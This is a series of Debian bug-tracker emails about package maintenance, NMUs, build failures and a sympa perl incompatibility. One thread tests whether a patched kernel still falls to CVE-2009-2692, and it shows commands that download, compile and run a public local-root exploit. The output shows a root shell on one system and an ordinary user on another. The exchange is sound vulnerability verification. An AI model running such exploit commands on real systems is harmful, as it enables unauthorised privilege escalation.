Sounds like a DSA for Lenny which hits both CVEs, as well as an upload
to sid, with urgency=high, seems to be the name of the game here.

micah


signature.asc
Description: Digital signature

Bug#474087: Tested and NMU'ing 2

[micah anderson]

On Sun, 31 Jan 2010 01:32:01 +0100, Sebastian Harl tok...@debian.org wrote:
 Hi,
 
 On Sat, Jan 30, 2010 at 07:23:35PM -0500, micah wrote:
  As part of the fun at the NYC BSP, I decided to try and fix this issue.
  
  I built this package, with the patch that Simon McVittie submitted. I
  then asked someone to test this on a system with ipmi and it seemed to
  work fine:
 
 Side note: The pkg-config commands are, of course, unrelated to IPMI
 being available on some system. In my earlier E-mail, I was referring to
 testing the OpenIPMI tools included in the package.

Ah, I didn't understand that. I don't actually have any idea how to test
the ipmi tools included in the package. I'm happy to arrange a test or
two to make sure that they are working as expected, if you can tell me
what I should run?

  aromatase:/var/temp# pkg-config --libs OpenIPMIpthread -pthread 
  -lOpenIPMIpthread -lOpenIPMIutils -lOpenIPMI
 
 I suppose, you're missing a newline here ;-)

Sorry, the missing line is just the:
aromatase:/var/temp#

Micah


pgpETcexog0vD.pgp
Description: PGP signature

Bug#566913: 566913: twisted-doc: recommends obsolete twisted-doc-api

[micah anderson]

As part of the BSP party here in NYC, I'm NMU'ing this, uploading to the
3-day DELAYED queue with this patch (with only a minor change in the
changelog to include the Closes line for this bug).

thanks!
micah


pgpo3jN21Nved.pgp
Description: PGP signature

Bug#552825: klibc: FTBFS: usr/kinit/nfsmount/mount.c:179: error: 'MNTPROC_MNT' undeclared (first use in this function)

[Micah Anderson]

Hi maks!

* maximilian attems m...@stro.at [2010-01-31 04:44-0500]:
 On Wed, Oct 28, 2009 at 11:41:14AM +0100, Lucas Nussbaum wrote:
  Source: klibc
  Version: 1.5.15-1
...

  During a rebuild of all packages in sid, your package failed to build on
  amd64.
  
  Relevant part:
 gcc -Wp,-MD,usr/kinit/nfsmount/.mount.o.d   -nostdinc -iwithprefix 
   include -Iusr/include/arch/x86_64 -Iusr/include/bits64 
   -Iusr/klibc/../include -Iusr/include -Ilinux/include   -D__KLIBC__=1 
   -D__KLIBC_MINOR__=5 -D_BITSIZE=64  -fno-stack-protector -m64  -Os 
   -fno-asynchronous-unwind-tables -fomit-frame-pointer -falign-functions=1 
   -falign-jumps=1 -falign-loops=1 -W -Wall -Wno-sign-compare 
   -Wno-unused-parameter   -c -o usr/kinit/nfsmount/mount.o 
   usr/kinit/nfsmount/mount.c
   usr/kinit/nfsmount/mount.c: In function 'mount_call':
   usr/kinit/nfsmount/mount.c:179: error: 'MNTPROC_MNT' undeclared (first 
   use in this function)

...

  The full build log is available from:
 
  http://people.debian.org/~lucas/logs/2009/10/28/klibc_1.5.15-1_lsid64.buildlog
  
 
 known, have a local patch for that, need to push upstream
 to also get a reall release of latest git, thanks.

Just poking you on this... your last email was from October, any
progress on this RC bug?

thx!
micah


signature.asc
Description: Digital signature

Bug#563380: [DRE-maint] Bug#563380: libgpgme-ruby1.8: /usr/lib/ruby/1.8/gpgme.rb:898:in `new': Unknown error code (GPGME::Error)

[micah anderson]

On Sun, 17 Jan 2010 19:56:47 +0100, Jérémy Bobbio lu...@debian.org wrote:
 On Sat, Jan 02, 2010 at 01:45:50PM +0100, Jérémy Bobbio wrote:
  The version of libgpgme-ruby1.8 currently in Debian is not compatible with 
  the
  version of libgpgme actually in Debian.
  […]
  This problem breaks schleuder in sid, so a fix or an updated version
  would be very much welcome.
 
 Ping?

 Should I do an NMU?

Hey Jérémy!

Although there are specific maintainers for ruby libraries maintained
under the pkg-ruby-extras team (and libgpgme-ruby seems to be maintained
by Rudi Cilibrasi cilib...@debian.org), I think that most everyone has
had other team members do work on others' packages, and I suspect that
one should assume a low-threshold NMU policy in general.

It would be better if you joined the team and updated the package via
the subversion repository, it would reduce the work on everyone in
general, however I would completely understand if you didn't feel like
joining yet another team, and its certainly not reasonable to ask that
all users of a package be part of the maintenance team :)

micah



pgpGNMLBn6jFU.pgp
Description: PGP signature

Bug#544756: [Secure-testing-team] Bug#544756: linux-image-2.6.26-2-686: Kernel still vulnerable by dsa-1862

[Micah Anderson]

* Christoph Siess c...@geekhost.info [2009-09-02 14:57-0400]:
 Package: linux-image-2.6.26-2-686
 Version: 2.6.26-17lenny2
 Severity: critical
 Tags: security
 Justification: root security hole
 
 
 Hi,
 
 according to http://www.debian.org/security/2009/dsa-1862 this Version of the 
 2.6.26-2 Kernel should 
 not be vulnerable to CVE-2009-2692.
 Unfortunately I'm still able to break my system:
 c...@server:~$ gcc exploit.c -o exploit
 c...@server:~$ ./exploit
 sh-3.2# id
 uid=0(root) gid=0(root) groups=115(wheel),1000(chs)
 
 I got the exploit from http://www.risesecurity.org/exploits/linux-sendpage.c
 
 Correct my if I got something wrong, but according to my understanding this 
 shouldn't be possible 
 with version 2.6.26-17lenny2.


I'm afraid this doesn't work on any of the systems i am running
2.6.26-17lenny2 on:

mi...@tern:~$ wget http://www.risesecurity.org/exploits/linux-sendpage.c
Saving to: `linux-sendpage.c'
100%[]
2009-09-03 19:01:43 (24.2 KB/s) - `linux-sendpage.c' saved [9380/9380]
mi...@tern:~$ gcc linux-sendpage.c -o exploit
mi...@tern:~$ ./exploit 
sh-3.2$ id
uid=1001(micah) gid=1007(micah)
groups=4(adm),20(dialout),33(www-data),100(users),1007(micah)

micah



signature.asc
Description: Digital signature

Bug#527872: Me too

[Micah Anderson]

I just upgraded to awesome 3.3.1-1 and because it seemed like this was
fixed, I decided to try a dbus restart, and was sad to find out it
actually wasn't. So this is a me too.

micah


signature.asc
Description: Digital signature

Bug#536452: rpm: please build-depend on libbeecrypt-dev

[Micah Anderson]

Hi Aníbal!

* Aníbal Monsalve Salazar ani...@debian.org [2009-07-09 21:20-0400]:
 util-vserver build-depends on libbeecrypt6-dev which will be removed
 from unstable in the near future.

Ok, thanks for the warning!

 The current beecrypt in unstable ships libbeecrypt-dev instead of
 libbeecrypt6-dev.

Hasn't hit my mirror yet, but I'll update the debian/control so the next
upload will have it!

Micah


signature.asc
Description: Digital signature

Bug#527065: util-vserver: diff for NMU version 0.30.216~r2772-6.1

[Micah Anderson]

Hi Andrew,

* Andrew Lee and...@linux.org.tw [2009-06-13 02:40-0400]:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 tags 527065 +patch
 thanks
 
 Dear maintainer,
 
 I've prepared an NMU for util-vserver (versioned as 0.30.216~r2772-6.1).
 And it will be uploaded to DELAYED/02. Please free to tell me if I should
 delay it longer.

I appreciate the help with the package, although typically a NMU is done
after a patch is not being applied, so sending a patch and doing a 2-day
NMU at the same time is a little aggressive. I'm also wondering how you
can do this NMU because as far as I can tell you aren't yet a DD :)

I have been working on a new version of util-vserver to upload, with a
newer snapshot, so I was delaying this fix until that was
finished. However I can upload this fix to resolve the RC bug.

In any case, what would be even better than doing NMUs would be if you
would join the Alioth team and help with the util-vserver packaging
effort, its an open team, although nobody has helped on it so far and I
would appreciate the help!

Micah


signature.asc
Description: Digital signature

Bug#527065: util-vserver: diff for NMU version 0.30.216~r2772-6.1

[Micah Anderson]

* Andrew Lee and...@linux.org.tw [2009-06-14 12:57-0400]:
 Hi Micah,
 
 Micah Anderson wrote:
  Hi Andrew,
  I appreciate the help with the package, although typically a NMU is done
  after a patch is not being applied, so sending a patch and doing a 2-day
  NMU at the same time is a little aggressive. I'm also wondering how you
  can do this NMU because as far as I can tell you aren't yet a DD :)
 
 Sorry for the unclear message. I do not want aggressive. I just
 reproduce other DD does for NMU. Please let me know the proper way if I
 did this wrong. I guess you may smelled that I am in NM process so that
 my AM would sponsor the upload. :)

No problem at all. The bug is a RC bug and I have not reacted to it in a
timely manner. Doing the NMU with a 2-day delay is fine, for this
bug. 

  I have been working on a new version of util-vserver to upload, with a
  newer snapshot, so I was delaying this fix until that was
  finished. However I can upload this fix to resolve the RC bug.
 
 I see. My attention was to solve the RC bug for next point release. It
 would be great if you accept this NMU for me.

I've uploaded a new package with that fix, thanks for sending the patch!

  In any case, what would be even better than doing NMUs would be if you
  would join the Alioth team and help with the util-vserver packaging
  effort, its an open team, although nobody has helped on it so far and I
  would appreciate the help!
 
 Thanks for your invitation. I've sent the request on Alioth. Please
 update me for the new version of util-vserver with a newer snapshot via
 alioth.

I have accepted your request on Alioth. 

micah


signature.asc
Description: Digital signature

Bug#526173: clamav-milter: initscript fails to start, options are deprecated

[Micah Anderson]

Package: clamav-milter
Version: 0.95.1+dfsg-0volatile2
Severity: grave
Justification: renders package unusable

New rewrite of clamav-milter fails to hurl, instead of starting, dry heaves.

First all previous command-line options seem to have mysteriously
disappeared and no documentation about where they went, or what they
should be replaced by in the config file. Pretty much any command-line
option causes milter to not start.

Second, initscript uses command-line options, so milter will not start
without editing initscript to deal with --pidfile $PIDFILE $SOCKET in
two locations.

micah

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#518198: [debpool] Bug#518198: One other missing dependency

[Micah Anderson]

* Magnus Holmgren holmg...@debian.org [2009-03-05 14:49-0500]:
 On onsdagen den 4 mars 2009, Micah Anderson wrote:
  The list of missing package dependencies is actually:
 
  libdigest-sha-perl, libarchive-tar-perl and liblinux-inotify2-perl
 
 I never got around to looking at Andres's changes, but I thought the 
 intention 
 was that at least libdigest-sha-perl and liblinux-inotify2-perl would be 
 optional?

When I ran debpool it complained about those missing perl libraries,
perhaps they are optional, but the complaints made me think otherwise.

micah




signature.asc
Description: Digital signature

Bug#518198: debpool: Missing dependencies

[Micah Anderson]

Package: debpool
Version: 0.5.1
Severity: grave
Justification: renders package unusable

Missing dependencies on: libarchive-tar-perl and liblinux-inotify2-perl

micah


-- System Information:
Debian Release: 5.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#518198: One other missing dependency

[Micah Anderson]

The list of missing package dependencies is actually:

libdigest-sha-perl, libarchive-tar-perl and liblinux-inotify2-perl  


signature.asc
Description: Digital signature

Bug#508397: dietlibc: Undefined symbol: umount2 on alpha and ia64

[Micah Anderson]

* Gerrit Pape [EMAIL PROTECTED] [2008-12-11 04:30-0500]:
 On Wed, Dec 10, 2008 at 04:11:14PM -0500, Micah Anderson wrote:
  As it turns out dietlibc-0.31 doesn't properly define the umount2
  symbols on two architectures: alpha and ia64. This sadly results in a
  build regression for util-vserver, which used to build on these
  architectures, but is refusing to build now. This is holding back an
  important transition of the package into Lenny. In otherwords, if this
  package cannot be built on alpha/ia64, then it will not be usable for
  most cases in Lenny due to the previous version not functioning
  properly in two important respects.
 
 Hi, I'm surprised.  Not that I question that there's possibly a bug, but
 version 0.31-1 of dietlibc is in the archive since more than one year.
 I wonder why the util-vserver package needs such changes that late in
 the Debian release cycle.

Yeah, I was surprised too. However, it goes far up the chain... the
newer kernels brought in some virtualization namespace changes, which
only have begun to appear in the kernels that have now transitioned into
Lenny. These new changes mean that util-vserver has to change the way it
deals with unmounting and cleanup in the guest because the chroot
barrier is being faded out in favor of the new namespaces and
pivot_root.

 Anyway, I'm sorry, I currently don't have the time to look at it or even
 upload a new package, please NMU if you think that's the right thing.

Ok, I've been recruiting testers on different arches and just have mips,
arm and sparc left to test before we are certain that the change works
right. 

thanks!
micah


signature.asc
Description: Digital signature

Bug#508397: dietlibc: Undefined symbol: umount2 on alpha and ia64

[Micah Anderson]

Package: dietlibc
Version: 0.31-1
Severity: grave
Tags: patch
Justification: renders package unusable

Hi,

As it turns out dietlibc-0.31 doesn't properly define the umount2
symbols on two architectures: alpha and ia64. This sadly results in a
build regression for util-vserver, which used to build on these
architectures, but is refusing to build now. This is holding back an
important transition of the package into Lenny. In otherwords, if this
package cannot be built on alpha/ia64, then it will not be usable for
most cases in Lenny due to the previous version not functioning
properly in two important respects.

The buildlogs which demonstrate this problem are:

alpha: 
http://buildd.debian.org/fetch.cgi?pkg=util-vserverver=0.30.216%7Er2772-5arch=alphastamp=1227907425file=log
ia64: 
http://buildd.debian.org/fetch.cgi?pkg=util-vserverver=0.30.216%7Er2772-5arch=ia64stamp=1227907303file=log

both complain, rightly:

diet -Os gcc -Wall -g -O2 -std=c99 -Wall -pedantic -W -funit-at-a-time
 -o src/exec-remount src/exec-remount.o lib/libvserver.a
 src/exec-remount.o: In function `main':
 /build/buildd/util-vserver-0.30.216~r2772/src/exec-remount.c:110:
 undefined reference to `umount2' collect2: ld returned 1 exit status

The solution to this is the attached patch, I believe.

micah



-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

dietlibc depends on no packages.

dietlibc recommends no packages.

Versions of packages dietlibc suggests:
ii  dietlibc-dev  0.31-1 diet libc - a libc optimized for s
pn  dietlibc-doc  none (no description available)

-- no debconf information
--- a/syscalls.s/umount.S	9 Jan 2001 17:57:49 -	1.1
+++ b/syscalls.s/umount.S	10 Dec 2008 20:21:33 -
@@ -1,3 +1,7 @@
 #include syscalls.h
 
+#if defined(__NR_oldumount)  defined(__NR_umount)
+syscall(oldumount,umount)
+#else
 syscall(umount,umount)
+#endif
--- a/syscalls.s/umount2.S	4 Jan 2003 22:21:48 -	1.2
+++ b/syscalls.s/umount2.S	10 Dec 2008 20:21:33 -
@@ -1,5 +1,7 @@
 #include syscalls.h
 
-#ifdef __NR_umount2
+#if defined(__NR_umount2)
 syscall(umount2,umount2)
+#elif defined(__NR_oldumount)  defined(__NR_umount)
+syscall(umount,umount2)
 #endif

Bug#506949: util-vserver: /proc Permisson denied errors in vservers (e.g. openssh-server, postfix unusable)

[Micah Anderson]

* Florian Sievers [EMAIL PROTECTED] [2008-11-26 05:35-0500]:
 Package: util-vserver
 Version: 0.30.216~r2772-4
 Severity: critical
 Justification: breaks unrelated software
 
 *** Please type your report below this line ***
 After updating to version 0.30.216~r2772-4 services like openssh or
 postfix
 stopped working. This is the output from the auth.log form one of my
 vservers:
 
 ---Debug output from auth.log---
 Nov 25 11:39:25 web sshd[13098]: debug1: rexec start in 4 out 4 newsock
 4 pipe 6 sock 7
 Nov 25 11:39:25 web sshd[13091]: debug1: Forked child 13098.
 Nov 25 11:39:25 web sshd[13098]: error writing /proc/self/oom_adj:
 Permission denied
 Nov 25 11:39:25 web sshd[13098]: debug1: inetd sockets after dupping: 3,
 3
 Nov 25 11:39:25 web sshd[13098]: Connection from 192.168.0.140 port
 52076
 Nov 25 11:39:25 web sshd[13098]: debug1: Client protocol version 2.0;
 client software version OpenSSH_5.1p1 Debian-3
 Nov 25 11:39:25 web sshd[13098]: debug1: match: OpenSSH_5.1p1 Debian-3
 pat OpenSSH*
 Nov 25 11:39:25 web sshd[13098]: debug1: Enabling compatibility mode for
 protocol 2.0
 Nov 25 11:39:25 web sshd[13098]: debug1: Local version string
 SSH-2.0-OpenSSH_5.1p1 Debian-3
 Nov 25 11:39:25 web sshd[13099]: fatal: chroot(/var/run/sshd):
 Operation not permitted
 Nov 25 11:39:25 web sshd[13099]: debug1: do_cleanup
 Nov 25 11:39:25 web sshd[13098]: debug1: do_cleanup
 --End of debug output--
 
 Same problems with postfix and dovecot. The chroot command on the
 console fails
 too.

For sshd, this appears to be because of UsePrivilegeSeparation being
set to 'yes' in in sshd config, which is the debian default along with
SYS_CHROOT bcapability restricted by default in -4.

micah



signature.asc
Description: Digital signature

Bug#506949: util-vserver: /proc Permisson denied errors in vservers (e.g. openssh-server, postfix unusable)

[Micah Anderson]

What kernel version and arch are you running? It looks like i686 from
your bug report, but please verify.

I'm on i686 with 2.6.26, and I am not able to replicate this.

Micah


signature.asc
Description: Digital signature

Bug#501154: sympa: not supported by perl version in Lenny

[Micah Anderson]

 Micah Anderson a écrit :
 Package: sympa
 Version: 5.3.4-5.2
 Severity: grave
 Justification: renders package unusable

 After installation of sympa, it tries to start the daemons, and the
 following errors are printed out for each of the daemons:

 Setting up sympa (5.3.4-5.2) ...
 Starting Sympa mailing list manager: sympaPrototype mismatch: sub 
 Lock::LOCK_SH () vs none at /usr/lib/sympa/bin/Lock.pm line 38.
 Constant subroutine LOCK_SH redefined at /usr/lib/sympa/bin/Lock.pm line 38.
 Prototype mismatch: sub Lock::LOCK_EX () vs none at 
 /usr/lib/sympa/bin/Lock.pm line 39.
 Constant subroutine LOCK_EX redefined at /usr/lib/sympa/bin/Lock.pm line 39.
 Prototype mismatch: sub Lock::LOCK_NB () vs none at 
 /usr/lib/sympa/bin/Lock.pm line 40.
 Constant subroutine LOCK_NB redefined at /usr/lib/sympa/bin/Lock.pm line 40.
 $* is no longer supported at /usr/lib/sympa/bin/sympa.pl line 162.

 I made these go away by commenting out:

 #sub LOCK_SH {1};
 #sub LOCK_EX {2};
 #sub LOCK_NB {4};

 in Lock.pm on line 38, I dont know if this causes any problems 

* Olivier Salaün [EMAIL PROTECTED] [2008-10-06 03:19-0400]:
 The first problem (Constant subroutine LOCK_XX redefined) has already  
 been fixed *4 months ago* in the development trunk as well as in the 5.4  
 stable branch, see  
 http://sourcesup.cru.fr/cgi/viewvc.cgi/branches/sympa-5.4-branch/src/Lock.pm?r1=4922r2=5048

Great! I should have checked this before reporting it upstream.

 The other error:

 $* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.  
 
  Is not something I 
 know how to fix, however I believe that this was
 deprecated by perl 5.10 as perldoc perlvar says:

[snip]

 Which makes me think that maybe this should be changed to use the /m
 modifier, but I dont know what this particular function in sympa does.

* Olivier Salaün [EMAIL PROTECTED] [2008-10-06 03:19-0400]:
 You're right, we had already fixed similar code earlier but obviously  
 forgot this one. We'll fix the problem ASAP in both trunk and 5.4 branch.
 If you don't mind, could you add an entry in Sympa's own tracking system  
 : https://sourcesup.cru.fr/tracker/?group_id=23

Certainly, I'll add something right now. Sorry for the delay.

Micah


signature.asc
Description: Digital signature

Bug#501154: sympa: not supported by perl version in Lenny

[Micah Anderson]

* Olivier Berger [EMAIL PROTECTED] [2008-10-06 04:45-0400]:
 Le lundi 06 octobre 2008 à 12:17 +0200, Olivier Salaün a écrit :
  Micah Anderson a écrit :
  
   After installation of sympa, it tries to start the daemons, and the
   following errors are printed out for each of the daemons:
  
   Setting up sympa (5.3.4-5.2) ...
   Starting Sympa mailing list manager: sympaPrototype mismatch: sub 
   Lock::LOCK_SH () vs none at /usr/lib/sympa/bin/Lock.pm line 38.
 
 SNIP
 
 FYI, I have merged with bug #483891 which had been filed already for
 that problem.

My apologies, I should have looked at older bugs to see if it was
already filed. 

   in Lock.pm on line 38, I dont know if this causes any problems 
  The first problem (Constant subroutine LOCK_XX redefined) has already 
  been fixed *4 months ago* in the development trunk as well as in the 5.4 
  stable branch, see 
  http://sourcesup.cru.fr/cgi/viewvc.cgi/branches/sympa-5.4-branch/src/Lock.pm?r1=4922r2=5048
 
 And the corresponding bug was tagged as forwarded to
 http://sourcesup.cru.fr/tracker/index.php?func=detailaid=3953group_id=23atid=167
  in http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=483891#11 ... ;-)

Great, and it looks like a new version of the package was uploaded to
Debian with these patches applied.

However, to get these into Lenny, a release exception will need to be
requested through debian-release.

   The other error:
  
   $* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.
 

* Olivier Berger [EMAIL PROTECTED] [2008-10-06 04:45-0400]:
  You're right, we had already fixed similar code earlier but obviously 
  forgot this one. We'll fix the problem ASAP in both trunk and 5.4 branch.
  If you don't mind, could you add an entry in Sympa's own tracking system 
  : https://sourcesup.cru.fr/tracker/?group_id=23
  Thanks.
 
 I'm not sure, but maybe this needs reopening
 http://sourcesup.cru.fr/tracker/index.php?func=detailaid=3953group_id=23atid=167
  instead ?

This is the same URL as above (about Lock.pm), but this second issue
has nothing to do with Lock.pm, but is about the use of '$*', so I
think I'll open another bug.

Micah



signature.asc
Description: Digital signature

Bug#501605: I cannot reproduce this

[Micah Anderson]

tag 501605 + unreproducible
thanks

I've just attempted to do an install of -6 myself and I did not get this
error:

Setting up sympa (5.3.4-6) ...
Configuration file read, default log level  0
Sympa 5.3.4 started
Conf::checkfiles() creating spool /var/spool/sympa/automatic
Conf::checkfiles() creating spool /var/spool/sympa/topic
Conf::checkfiles() creating spool /var/spool/sympa/bounce
Conf::checkfiles() creating spool /var/spool/sympa/subscribe
Conf::checkfiles() creating spool /var/spool/sympa/distribute
Conf::checkfiles() creating spool /var/spool/sympa/msg/bad
Conf::checkfiles() creating spool /var/spool/sympa/distribute/bad
Conf::checkfiles() creating spool /var/spool/sympa/automatic/bad
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/style.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/print.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/fullPage.css ; previous file renamed
Conf::checkfiles() Updating static CSS file
/var/lib/sympa/static_content/css/print-preview.css ; previous file
renamed
Language::SetLang() Language::SetLang(), missing locale parameter
Upgrade process...
Upgrading from  to 5.3.4...
Upgrade::upgrade() Upgrade::upgrade(, 5.3.4)
Upgrade::upgrade() Rebuilding config.bin files for ALL lists...it may
take a while...
Upgrade::upgrade() Rebuilding the admin_table...
Upgrade::upgrade() Migrating templates to TT2 format...
Upgrade::upgrade() Rebuilding web archives...
Upgrade::upgrade() Initializing the new admin_table...
Upgrade::upgrade() Old web templates HTML structure is not compliant
with latest ones.
Upgrade::upgrade() Moving old-style web templates out of the
include_path...
Upgrade::upgrade() Cleaning buggy list config files...
Upgrade::upgrade() Rename archives/log. files...
Upgrade::upgrade() Updating the new robot_subscriber and robot_admin  Db
fields...
Upgrade::upgrade() Renaming web archive directories with the list
domain...
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Updating subscribed field of the subscriber table...
Upgrade::upgrade() 0 rows have been updated
Upgrade::upgrade() Renaming bounce sub-directories adding list domain...
Upgrade::upgrade() Update lists config using include_list parameter...
Upgrade::upgrade() Looking for customized mhonarc-ressources.tt2
files...
Upgrade::upgrade() Rebuilding web archives...
Upgrade::upgrade() Q-Encoding web documents filenames...
Upgrade::upgrade() Encoding all custom files to UTF-8...
Upgrade::upgrade() 0 files have been modified
Upgrade process finished.
Starting Sympa mailing list manager: sympa.
Starting Sympa mailing list archive manager: archived.
Starting Sympa task manager: task_manager.
Starting Sympa bounce manager: bounced.
Reading package lists... Done 
Building dependency tree   
Reading state information... Done
Reading extended state information   
Initializing package states... Done
Writing extended state information... Done
Reading task descriptions... Done 


signature.asc
Description: Digital signature

Bug#496520: patch to resolve this

[Micah Anderson]

tags 496520 +patch
thanks

Hi,

Attached is a patch to fix this insecure tempfile usage in the code. I
did not make the POD change, as I think that this doesn't qualify as an
RC-exception (this doesn't mean it should not be fixed, just that
justifying this change for a freeze-exception doesn't seem likely).

I am uploading this fix as there is a 0-day NMU policy for RC bugs, and
this has been open for much longer than zero days.

Micah


signature.asc
Description: Digital signature

Bug#501154: sympa: not supported by perl version in Lenny

[Micah Anderson]

Package: sympa
Version: 5.3.4-5.2
Severity: grave
Justification: renders package unusable

After installation of sympa, it tries to start the daemons, and the
following errors are printed out for each of the daemons:

Setting up sympa (5.3.4-5.2) ...
Starting Sympa mailing list manager: sympaPrototype mismatch: sub Lock::LOCK_SH 
() vs none at /usr/lib/sympa/bin/Lock.pm line 38.
Constant subroutine LOCK_SH redefined at /usr/lib/sympa/bin/Lock.pm line 38.
Prototype mismatch: sub Lock::LOCK_EX () vs none at /usr/lib/sympa/bin/Lock.pm 
line 39.
Constant subroutine LOCK_EX redefined at /usr/lib/sympa/bin/Lock.pm line 39.
Prototype mismatch: sub Lock::LOCK_NB () vs none at /usr/lib/sympa/bin/Lock.pm 
line 40.
Constant subroutine LOCK_NB redefined at /usr/lib/sympa/bin/Lock.pm line 40.
$* is no longer supported at /usr/lib/sympa/bin/sympa.pl line 162.

I made these go away by commenting out:

#sub LOCK_SH {1};
#sub LOCK_EX {2};
#sub LOCK_NB {4};

in Lock.pm on line 38, I dont know if this causes any problems or not. 

The other error:

$* is no longer supported at /usr/lib/sympa/bin/parser.pl line 63.  

 
Is not something I know how to fix, however I believe that this was
deprecated by perl 5.10 as perldoc perlvar says:

   $* Set to a non-zero integer value to do multi-line matching
   within a string, 0 (or undefined) to tell Perl that it can assume that 
strings
   contain a single line, for the purpose of optimizing pattern
   matches. Pattern matches on strings con taining multiple newlines can
   produce confusing results when $* is 0 or undefined. Default is
   undefined. (Mnemonic: * matches multiple things.) This variable
   influences the interpretation of only ^ and $. A literal newline can
   be searched for even when $* == 0.

   Use of $* is deprecated in modern Perl, supplanted by the /s and /m
   modifiers on pattern matching.

   Assigning a non-numerical value to $* triggers a warning (and makes
   $* act if $* == 0), while assigning a numerical value to $* makes
   that an implicit int is applied on the value.

Which makes me think that maybe this should be changed to use the /m
modifier, but I dont know what this particular function in sympa does.

Due to the fact that the four daemons all produce these errors when
sympa is started, and the effects of running code with unsupported
perlisms and unresolved prototype mismatches makes me think that this
version of sympa should not be released with Debian.

Micah

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-vserver-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages sympa depends on:
ii  adduser  3.110   add and remove users and groups
ii  debconf [debconf-2.0]1.5.23  Debian configuration management sy
ii  dsyslog [system-log-daemon]  0.4.0   advanced modular syslog daemon
pn  libarchive-zip-perl  none  (no description available)
ii  libc62.7-13  GNU C Library: Shared libraries
pn  libcgi-fast-perl none  (no description available)
pn  libcrypt-ciphersaber-perlnone  (no description available)
ii  libdbd-mysql-perl4.008-1 A Perl5 database interface to the 
ii  libdbi-perl  1.607-1 Perl5 database interface by Tim Bu
ii  libfcgi-perl 0.67-2.1+b1 FastCGI Perl module
pn  libintl-perl none  (no description available)
ii  libio-stringy-perl   2.110-4 Perl modules for IO from scalars a
ii  libmailtools-perl2.04-1  Manipulate email in perl programs
pn  libmd5-perl  none  (no description available)
ii  libmime-perl 5.427-1 transitional dummy package
ii  libmime-tools-perl [libmime- 5.427-1 Perl5 modules for MIME-compliant m
pn  libmsgcat-perl   none  (no description available)
pn  libnet-ldap-perl none  (no description available)
pn  libtemplate-perl none  (no description available)
ii  libxml-libxml-perl   1.66-1+b1   Perl module for using the GNOME li
pn  mhonarc  none  (no description available)
ii  perl [libmime-base64-perl]   5.10.0-15   Larry Wall's Practical Extraction 
pn  perl-suidnone  (no description available)
ii  postfix [mail-transport-agen 2.5.5-1.1   High-performance mail transport ag

Versions of packages sympa recommends:
ii  doc-base  0.8.16 utilities to manage online documen
ii  logrotate 3.7.1-4Log rotation utility

Versions of packages sympa suggests:
ii  apache2-mpm-prefork [httpd]   2.2.9-10   Apache HTTP Server - 

Bug#498144: More information about this bug

[Micah Anderson]

-smime.$$ is created
 ## to store the signer certificat for step two. I known, that's durty.
 
+my $temporary_file = /tmp/smime-sender..$$ ;
-my $temporary_file = $Conf{'tmpdir'}./.'smime-sender.'.$$ ;
 my $trusted_ca_options = '';
 $trusted_ca_options = -CAfile $Conf{'cafile'}  if ($Conf{'cafile'});
 $trusted_ca_options .= -CApath $Conf{'capath'}  if ($Conf{'capath'});
diff -u sympa-5.3.4/debian/postinst sympa-5.3.4/debian/postinst
--- sympa-5.3.4/debian/postinst
+++ sympa-5.3.4/debian/postinst
@@ -481,8 +481,4 @@
 db_stop
 
-## Upgrade sympa from previous version(s) if necessary. The upgrade script is smart enough to know 
-## if it needs to do anything or not
-/usr/lib/sympa/bin/sympa.pl --upgrade
-
 ## Other jobs
 #DEBHELPER#
diff -u sympa-5.3.4/debian/changelog sympa-5.3.4/debian/changelog
--- sympa-5.3.4/debian/changelog
+++ sympa-5.3.4/debian/changelog
@@ -1,13 +1,3 @@
-sympa (5.3.4-5.3) unstable; urgency=low
-
-  * Non-maintainer upload.
-  * Fix insecure use of /tmp in sympa scripts by applying upstream
-patch to tools.pl (Closes: #496520)
-  * Add the sympa.pl --upgrade procedure to the debian/postinst 
-to migrate existing installs (Closes: #498144)
-
- -- Micah Anderson [EMAIL PROTECTED]  Sat, 04 Oct 2008 14:03:54 -0400
-
 sympa (5.3.4-5.2) unstable; urgency=low
 
   * Non-maintainer upload.


signature.asc
Description: Digital signature

Bug#496520: Forgot to attach the patch

[Micah Anderson]

The patch wasn't attached to the bug, as I previously said it was. I'm
attaching it to this email instead. 

This patch also contains a fix for #498144 (attached to that bug report
as well). 

The upload has been sent to the 5-day delayed queue.
